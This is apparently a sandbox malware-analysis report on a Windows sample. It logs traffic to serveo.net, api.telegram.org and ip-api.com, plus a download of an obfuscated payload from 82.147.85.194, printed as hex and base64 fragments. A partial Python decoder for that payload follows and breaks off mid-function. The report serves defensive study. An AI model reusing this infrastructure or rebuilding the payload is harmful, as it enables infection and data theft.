                                                                                                    Feb 10, 2024 16:17:21.818480968 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.818475962 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:21.818476915 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:21.818572044 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:21.821186066 CET497418080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:21.822941065 CET49746443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.823020935 CET44349746149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.823122978 CET49746443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.823493958 CET49746443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.823530912 CET44349746149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.036088943 CET808049741185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.036168098 CET497418080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:22.070139885 CET44349745149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.070200920 CET44349745149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.071192980 CET49745443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:22.075911045 CET49745443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:22.178201914 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.178241968 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.178462982 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:22.179250956 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:22.250319004 CET44349746149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.251621962 CET49746443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:22.251682043 CET44349746149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.387151003 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.397252083 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:22.605124950 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.654850006 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:22.807017088 CET44349746149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.807200909 CET44349746149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.807471991 CET49746443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:22.807703018 CET49746443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:23.028242111 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:23.028361082 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:23.029496908 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:23.030333042 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:23.235929012 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:23.261353970 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:23.466623068 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:23.514146090 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:37.867306948 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:37.867394924 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:38.723332882 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:38.724828959 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:53.071433067 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:53.075329065 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:53.927589893 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:53.928122044 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:18:08.279517889 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:18:08.279607058 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:18:09.132179022 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:18:09.132299900 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:18:23.483294010 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:18:23.483530998 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:18:24.335359097 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:18:24.335434914 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:18:38.691306114 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:18:38.691412926 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:18:39.539433956 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:18:39.539526939 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:18:53.899416924 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:18:53.899602890 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:18:54.743271112 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:18:54.743417025 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:09.107270002 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:09.107474089 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:09.947406054 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:09.947509050 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:24.315329075 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:24.315613031 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:25.151099920 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:25.151165962 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:28.361043930 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:28.372390985 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:28.568891048 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:28.578094959 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:28.585113049 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:28.685769081 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:28.708792925 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:28.831078053 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:28.951452971 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:43.795293093 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:43.795594931 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:43.923296928 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:43.923386097 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:59.003113985 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:59.003410101 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:59.127135038 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:59.127238035 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:20:14.214940071 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:20:14.215151072 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:20:14.331005096 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:20:14.331123114 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:20:29.422979116 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:20:29.423302889 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:20:29.535002947 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:20:29.535103083 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:20:44.631213903 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:20:44.631416082 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:20:44.739269972 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:20:44.739370108 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:20:59.843040943 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:20:59.843226910 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:20:59.943020105 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:20:59.943265915 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:21:15.054945946 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:21:15.055129051 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:21:15.146835089 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:21:15.146929979 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:21:30.262789011 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:21:30.262975931 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:21:30.350822926 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:21:30.350927114 CET4974222192.168.2.4138.68.79.95
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 10, 2024 16:17:17.405252934 CET | 51954 | 53 | 192.168.2.4 | 1.1.1.1
Feb 10, 2024 16:17:17.523276091 CET | 53 | 51954 | 1.1.1.1 | 192.168.2.4
Feb 10, 2024 16:17:18.442881107 CET | 58800 | 53 | 192.168.2.4 | 1.1.1.1
Feb 10, 2024 16:17:18.678560972 CET | 53 | 58800 | 1.1.1.1 | 192.168.2.4
Feb 10, 2024 16:17:19.532113075 CET | 52616 | 53 | 192.168.2.4 | 1.1.1.1
Feb 10, 2024 16:17:19.649746895 CET | 53 | 52616 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 10, 2024 16:17:17.405252934 CET | 192.168.2.4 | 1.1.1.1 | 0xc02b | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Feb 10, 2024 16:17:18.442881107 CET | 192.168.2.4 | 1.1.1.1 | 0xd06d | Standard query (0) | serveo.net | A (IP address) | IN (0x0001) | false
Feb 10, 2024 16:17:19.532113075 CET | 192.168.2.4 | 1.1.1.1 | 0xa81f | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 10, 2024 16:17:17.523276091 CET | 1.1.1.1 | 192.168.2.4 | 0xc02b | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Feb 10, 2024 16:17:18.678560972 CET | 1.1.1.1 | 192.168.2.4 | 0xd06d | No error (0) | serveo.net | | 138.68.79.95 | A (IP address) | IN (0x0001) | false
Feb 10, 2024 16:17:19.649746895 CET | 1.1.1.1 | 192.168.2.4 | 0xa81f | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                                    • api.telegram.org
                                                                                                    • 82.147.85.194
                                                                                                    • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49729 | 82.147.85.194 | 80 | 6780 | C:\Users\user\Desktop\jqOHOuPMJP.exe
Timestamp | Bytes transferred | Direction | Data
Feb 10, 2024 16:17:08.643671036 CET | 87 | OUT | GET /byte/@jokerbot880901.txt HTTP/1.1
Host: 82.147.85.194
Connection: Keep-Alive
Feb 10, 2024 16:17:08.921837091 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                    Date: Sat, 10 Feb 2024 15:17:08 GMT
                                                                                                    Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
                                                                                                    Last-Modified: Sat, 10 Feb 2024 11:23:12 GMT
                                                                                                    ETag: "2ad0c-6110545204780"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Content-Length: 175372
                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: text/plain
                                                                                                    Data Raw: 4e 69 48 72 65 33 68 37 65 33 74 2f 65 33 74 37 68 49 52 37 65 38 4e 37 65 33 74 37 65 33 74 37 4f 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 2b 33 74 37 65 33 56 6b 77 58 56 37 7a 33 4b 32 57 73 4e 36 4e 37 5a 61 4c 78 4d 53 43 46 73 4c 43 52 51 63 43 52 6f 57 57 78 67 61 46 52 55 55 44 31 73 5a 48 6c 73 4a 44 68 56 62 45 68 56 62 50 7a 51 6f 57 78 59 55 48 78 35 56 64 6e 5a 78 58 33 74 37 65 33 74 37 65 33 73 72 50 6e 74 37 4e 33 70 34 65 2f 6c 36 49 4d 52 37 65 33 74 37 65 33 74 37 65 35 74 37 57 58 74 77 65 6b 74 37 65 37 56 36 65 33 74 78 65 33 74 37 65 33 74 37 35 5a 5a 36 65 33 74 62 65 33 74 37 65 33 6c 37 65 33 73 37 65 33 74 62 65 33 74 37 65 58 74 37 66 33 74 37 65 33 74 37 65 33 74 39 65 33 74 37 65 33 74 37 65 33 73 37 65 58 74 37 65 58 74 37 65 33 74 37 65 33 6c 37 47 2f 35 37 65 32 74 37 65 32 74 37 65 33 74 37 61 33 74 37 61 33 74 37 65 33 74 37 65 32 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 7a 65 57 65 6e 73 30 65 33 74 37 65 33 74 35 65 30 4e 38 65 33 74 37 65 33 74 37 65 33 74 37 65 33 75 68 65 6e 75 7a 58 48 74 37 65 31 74 35 65 33 64 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 57 33 74 37 63 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 63 31 74 37 65 7a 4e 37 65 33 74 37 65 33 74 37 65 33 74 37 65 31 55 50 48 67 4d 50 65 33 74 37 33 37 5a 36 65 33 74 62 65 33 74 37 74 58 70 37 65 33 6c 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 31 74 37 65 78 74 56 43 51 67 4a 47 48 74 37 65 30 4e 38 65 33 74 37 65 33 6c 37 65 33 4e 37 65 33 75 72 65 6e 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 73 37 65 33 73 37 56 51 6b 65 46 78 51 59 65 33 74 33 65 33 74 37 65 31 74 35 65 33 
74 35 65 33 74 37 6f 33 70 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 4f 33 74 37 4f 58 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 76 37 6c 6e 70 37 65 33 74 37 65 7a 4e 37 65 33 74 35 65 33 35 37 6a 36 68 37 65 79 4e 69 65 6e 74 36 65 33 74 37 54 6e 74 37 66 58 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 79 73 77 65 6e 6c 73 63 47 39 37 68 49 53 45 68 49 53 45 68 49 53 45 68 49 53 45 65 33 74 37 65 32 39 37 65 33 74 75 65 33 74 37 62 58 74 37 65 32 78 37 65 33 74 69 65 33 74 37 54 6e 74 37 65 79 74 37 65 33 73 56 65 33 74 37 44 48 74 37 65 77 42 37 65 33 76 38 65 33 74 37 38 6e 74 37 65 2f 46 37 65 33 76 77 65 33 74 37 39 48 74 37 65 39 70 37 65 33 76 5a 65 33 74 37 2f 6e 70 37 65 38 42 36 65 33 76 47 65 6e 74 37 71 6e 70 37 65 34 39 36 65 33 74 35 65 58 74 37 64 6e 6c 37 65 32 6c 35 65 33 74 6b 65 58 74 37 42 33 6c 37 65 36 5a 34 65 33
                                                                                                    Data Ascii: NiHre3h7e3t/e3t7hIR7e8N7e3t7e3t7O3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7+3t7e3VkwXV7z3K2WsN6N7ZaLxMSCFsLCRQcCRoWWxgaFRUUD1sZHlsJDhVbEhVbPzQoWxYUHx5VdnZxX3t7e3t7e3srPnt7N3p4e/l6IMR7e3t7e3t7e5t7WXtwekt7e7V6e3txe3t7e3t75ZZ6e3tbe3t7e3l7e3s7e3tbe3t7eXt7f3t7e3t7e3t9e3t7e3t7e3s7eXt7eXt7e3t7e3l7G/57e2t7e2t7e3t7a3t7a3t7e3t7e2t7e3t7e3t7e3t7ezeWens0e3t7e3t5e0N8e3t7e3t7e3t7e3uhenuzXHt7e1t5e3d7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7W3t7c3t7e3t7e3t7e3t7c1t7ezN7e3t7e3t7e3t7e1UPHgMPe3t737Z6e3tbe3t7tXp7e3l7e3t7e3t7e3t7e3t7e1t7extVCQgJGHt7e0N8e3t7e3l7e3N7e3urent7e3t7e3t7e3t7e3s7e3s7VQkeFxQYe3t3e3t7e1t5e3t5e3t7o3p7e3t7e3t7e3t7e3t7O3t7OXt7e3t7e3t7e3t7e3t7e3v7lnp7e3t7ezN7e3t5e357j6h7eyNient6e3t7Tnt7fXt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7eyswenlscG97hISEhISEhISEhISEe3t7e297e3tue3t7bXt7e2x7e3tie3t7Tnt7eyt7e3sVe3t7DHt7ewB7e3v8e3t78nt7e/F7e3vwe3t79Ht7e9p7e3vZe3t7/np7e8B6e3vGent7qnp7e496e3t5eXt7dnl7e2l5e3tkeXt7B3l7e6Z4e3
Feb 10, 2024 16:17:08.921875000 CET | 1286 | IN | Data Raw: 75 6c 65 48 74 37 6d 48 68 37 65 33 70 2f 65 33 74 35 66 33 74 37 51 33 39 37 65 7a 42 2f 65 33 76 69 66 6e 74 37 69 6e 35 37 65 38 42 39 65 33 74 76 66 48 74 37 62 6e 78 37 65 79 42 38 65 33 74 36 63 33 74 37 57 58 4e 37 65 31 68 7a 65 33 74 64
                                                                                                    Data Ascii: uleHt7mHh7e3p/e3t5f3t7Q397ezB/e3vifnt7in57e8B9e3tvfHt7bnx7eyB8e3t6c3t7WXN7e1hze3tdc3t7XHN7e793e3uRd3t7RnZ7e79oe3s9b3t72297e0Nue3uEbnt7e217e3dse3tJbHt7C2x7ewhse3saZXt762R7e+pke3uAW3t7+Vh7e2tce3uwUHt7phh7e/wSe3vyEnt78RJ7e/ASe3srMH19e3t7eysweH9ve
Feb 10, 2024 16:17:08.921915054 CET | 1286 | IN | Data Raw: 65 33 74 39 55 51 55 4a 4e 52 4a 37 43 31 4e 36 65 33 74 39 43 63 38 65 65 77 73 4a 66 78 4e 37 43 31 4e 36 65 33 74 39 55 79 31 37 65 33 31 52 4f 51 6c 2f 45 33 73 4c 55 33 70 37 65 33 33 37 37 33 74 37 66 31 46 56 43 47 35 36 65 33 33 37 32 58
                                                                                                    Data Ascii: e3t9UQUJNRJ7C1N6e3t9Cc8eewsJfxN7C1N6e3t9Uy17e31ROQl/E3sLU3p7e33773t7f1FVCG56e3372Xt7f1ElewXae3t/U3R6e33723t7f1MCentxe1EZZD32Ant7el6rvHt7f1Mse3tx+917e39R3QVOe3t/CYcPewtTent7fVP3e3tx+9B7e38JYQ57C1N6e3t9+9d7e39R3QluDHsLU3p7e3371nt7fwVPe3t/CZsMewt
Feb 10, 2024 16:17:08.921937943 CET | 1286 | IN | Data Raw: 4e 6c 68 58 39 6f 66 32 70 2f 51 62 61 45 68 49 51 46 64 33 74 37 66 33 31 38 35 58 74 39 62 43 4e 78 66 51 56 33 65 33 74 2f 39 52 4b 46 66 32 68 2b 61 6e 35 42 32 49 53 45 68 46 46 37 65 32 68 4c 65 48 74 4e 65 33 74 37 65 48 74 37 61 6e 74 35
                                                                                                    Data Ascii: NlhX9of2p/QbaEhIQFd3t7f3185Xt9bCNxfQV3e3t/9RKFf2h+an5B2ISEhFF7e2hLeHtNe3t7eHt7ant5Y2IIWHt7cXF9eG1Tf3t7fXB8eF5BfXt7e10FWnt7cQZ9e3t/fHkGf3t7f3x3Q3t7e3tzUXt7aEt/e0N7e3t/e3tqewhae3t9XnheQX17e3tdBVp7e3EGfXt7f155Bn57e39eYwZye3t/Xn8GcXt7f3F9cEN7e3t7f
Feb 10, 2024 16:17:08.921962976 CET | 1286 | IN | Data Raw: 59 58 74 37 63 58 46 39 63 32 30 55 53 6e 74 37 63 57 32 46 65 6d 68 79 61 6e 4a 43 63 33 74 37 65 33 31 7a 55 32 46 37 65 33 46 78 66 31 4e 4a 65 33 74 78 64 6e 74 79 61 48 46 74 61 48 42 44 55 6e 74 37 65 32 70 78 61 6e 44 68 61 48 64 35 65 47
                                                                                                    Data Ascii: YXt7cXF9c20USnt7cW2FemhyanJCc3t7e31zU2F7e3Fxf1NJe3txdntyaHFtaHBDUnt7e2pxanDhaHd5eGp3fWp3U0h7e3FTYXt7cQnGe3sLU3x7e31danBsI2hwanBqcfUSRLeEhIR/U097e3Fof3tqf2h2bWh1Q2Z7e3tqdmp14Wh0eXhqdH0Jxnt7C1Nxe3t9e2p1bCNodWp1anb1EkSjhISEUXtoS397XXp7e3B7e2p7eQB
Feb 10, 2024 16:17:08.921992064 CET | 1286 | IN | Data Raw: 74 37 65 32 70 71 61 6d 74 35 41 48 78 37 65 33 39 7a 5a 46 55 6a 61 6e 45 6a 61 6e 41 6a 61 6e 63 55 4f 33 74 37 63 51 5a 6e 65 33 74 2f 61 6e 42 74 68 58 6c 6f 62 6d 70 75 51 6d 4e 37 65 33 74 37 65 58 6b 41 66 48 74 37 66 33 4e 6b 56 53 4e 71
                                                                                                    Data Ascii: t7e2pqamt5AHx7e39zZFUjanEjanAjancUO3t7cQZne3t/anBthXlobmpuQmN7e3t7eXkAfHt7f3NkVSNqcSNqalNge3t9e3t9amoUV3t7cXtzZFVqcSNqcCNqdyMjd3tzeQB8e3t/9RKFf2htam1Bp4aEhH1obEN7e3t7amxRe3t7YEt4e+Z7e3t2e3tqe39TOnt7cXF9Uzl7e3FthXp3c0J8e3t7fVM4e3txXX9TOXt7cXZyQ
Feb 10, 2024 16:17:08.922015905 CET | 1286 | IN | Data Raw: 58 58 74 37 65 32 6c 2b 55 79 6c 37 65 33 46 42 32 34 53 45 68 4b 5a 30 65 33 74 37 61 58 36 46 62 58 68 37 65 32 41 55 55 6e 74 37 63 58 75 6e 65 53 73 55 63 48 74 37 66 58 74 71 66 78 52 77 65 33 74 39 65 33 6b 72 41 48 39 37 65 33 39 54 4b 48
                                                                                                    Data Ascii: XXt7e2l+Uyl7e3FB24SEhKZ0e3t7aX6FbXh7e2AUUnt7cXuneSsUcHt7fXtqfxRwe3t9e3krAH97e39TKHt7cXt8eSsAf3t7f1Mve3txe3l5KwB/e3t/eSsAcnt7f1N+e3t9KnumcXt7e117bWhypkd7e3umVHt7e3t8Uy57e3FocWpxQnx7e3t8Uyh7e3F7c1Mue3txaHBqcEJ8e3t7c1Moe3txe3unbGhyQ3t7e3tqclF7e3t
Feb 10, 2024 16:17:08.922040939 CET | 1286 | IN | Data Raw: 74 78 65 33 6b 41 66 6e 74 37 66 33 4c 31 45 71 70 54 49 33 74 37 63 57 31 6a 46 45 35 37 65 33 46 37 65 51 42 2b 65 33 74 2f 63 2f 55 53 71 6c 4d 6a 65 33 74 78 62 57 4d 55 54 6e 74 37 63 58 74 35 41 48 35 37 65 33 39 74 55 79 4e 37 65 33 46 74
                                                                                                    Data Ascii: txe3kAfnt7f3L1EqpTI3t7cW1jFE57e3F7eQB+e3t/c/USqlMje3txbWMUTnt7cXt5AH57e39tUyN7e3FtYxROe3txe3kAfnt7f21TI3t7cW1jFE57e3F7eQB+e3t/bVMje3txbWMUTnt7cXt5AH57e39be/p7e1Mje3txbWMUTnt7cXt5AH57e395eABue3t/U257e31TInt7cW1hFE57e3F7eQB+e3t/fG189RIUTnt7cXt5A
Feb 10, 2024 16:17:08.922065973 CET | 1286 | IN | Data Raw: 68 48 74 37 65 79 54 75 65 41 42 6a 65 33 74 2f 5a 52 38 61 42 6d 4e 37 65 33 39 37 61 6e 4e 73 49 32 68 7a 61 6e 4d 56 66 42 47 46 66 32 68 79 61 6e 4a 42 75 59 53 45 68 48 4e 38 49 33 64 37 66 47 32 46 65 57 68 78 61 6e 46 42 2f 34 53 45 68 48
                                                                                                    Data Ascii: hHt7eyTueABje3t/ZR8aBmN7e397anNsI2hzanMVfBGFf2hyanJBuYSEhHN8I3d7fG2FeWhxanFB/4SEhHIUQ3t7cXt4AGp7e39lhXpocGpwQnx7e3tyFF97e3F7eF4AY3t7f24aBmN7e394cxUGaHt7f3h5AH57e38UUXt7cWp/IhYVBm97e394AGp7e39lO1J7e3t5AHl7e39BZXt7e38UXnt7cUJoe3t7eABve3t/eABoe3t
Feb 10, 2024 16:17:08.922091961 CET | 1286 | IN | Data Raw: 74 2f 66 67 42 76 65 33 74 2f 62 68 57 46 65 6d 68 79 61 6e 4a 43 61 33 74 37 65 33 35 34 66 57 52 76 49 31 4d 54 65 33 74 78 42 6d 39 37 65 33 39 2b 41 47 35 37 65 33 39 75 46 59 56 36 61 48 46 71 63 55 4a 72 65 33 74 37 66 6e 68 39 5a 47 63 6a
                                                                                                    Data Ascii: t/fgBve3t/bhWFemhyanJCa3t7e354fWRvI1MTe3txBm97e39+AG57e39uFYV6aHFqcUJre3t7fnh9ZGcjUxN7e3EGbnt7f3t7an9kcYV6aHBqcEIIe3t7e3h9ZSNTQHt7cXB4fWRxI1NAe3txd3xsO3F7e3tzZGOFekN6e3t7bWh3andCOnt7e3t+eH1kdyNTE3t7cVMSe3txBmJ7e39+eH1kbyNTE3t7cVMSe3txBmB7e39+e
Feb 10, 2024 16:17:09.198327065 CET | 1286 | IN | Data Raw: 65 33 46 6f 63 48 74 71 64 6d 70 33 46 53 4e 35 41 48 35 37 65 33 38 55 49 58 74 37 63 59 56 36 62 59 56 36 61 47 6c 71 61 55 4a 38 65 33 74 37 62 58 43 6d 42 48 74 37 65 33 6c 71 63 67 5a 7a 65 33 74 2f 65 57 70 78 72 2f 59 6f 65 33 74 36 42 6e
                                                                                                    Data Ascii: e3FocHtqdmp3FSN5AH57e38UIXt7cYV6bYV6aGlqaUJ8e3t7bXCmBHt7e3lqcgZze3t/eWpxr/Yoe3t6Bnx7e395AH57e39qcG0UM3t7cV15AH57e395AHx7e39tanESFDJ7e3FdeQB+e3t/anBtFDN7e3FdbHCmVXt7e3t5AH57e38UUXt7cW0RhXloaGpoQUmFhIR7pnN7e3tde3ume3t7e21wQ3t7e3t8UTpne3t7e3t7Gnt
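
The report shows the 175372-byte body of the /byte/@jokerbot880901.txt response only as raw bytes and does not say what it is. The following added example (not part of the Joe Sandbox report, and not the sample's own code) base64-decodes the first 64 characters of the Data Ascii line above, takes the most frequent decoded byte as a single-byte XOR key candidate, and checks the result against the layout of a PE file's DOS header. On this fragment the key is 0x7b and the decoded bytes begin with the standard MZ header, so the ".txt" delivers an XOR-obfuscated executable. The fragment is transcribed from the report; the key-guess heuristic and the header check are this example's own.

```python
"""Recover the start of the body returned for GET /byte/@jokerbot880901.txt.
Added example, not part of the Joe Sandbox report: CAPTURED_B64 is transcribed from the
report's Data Ascii line; the key-recovery heuristic and header check are this example's own."""
import base64
import struct
from collections import Counter

# First 64 characters of the "Data Ascii" shown for the 1286-byte response chunk (transcribed).
CAPTURED_B64 = "NiHre3h7e3t/e3t7hIR7e8N7e3t7e3t7O3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7"

# e_magic through e_ovno: the first 28 bytes of IMAGE_DOS_HEADER, little-endian.
DOS_HEADER = struct.Struct("<2s13H")
DOS_FIELDS = ("e_magic", "e_cblp", "e_cp", "e_crlc", "e_cparhdr", "e_minalloc", "e_maxalloc",
              "e_ss", "e_sp", "e_csum", "e_ip", "e_cs", "e_lfarlc", "e_ovno")


def decode_prefix(fragment: str) -> bytes:
    """Base64-decode a truncated stream: keep only the complete 4-character groups."""
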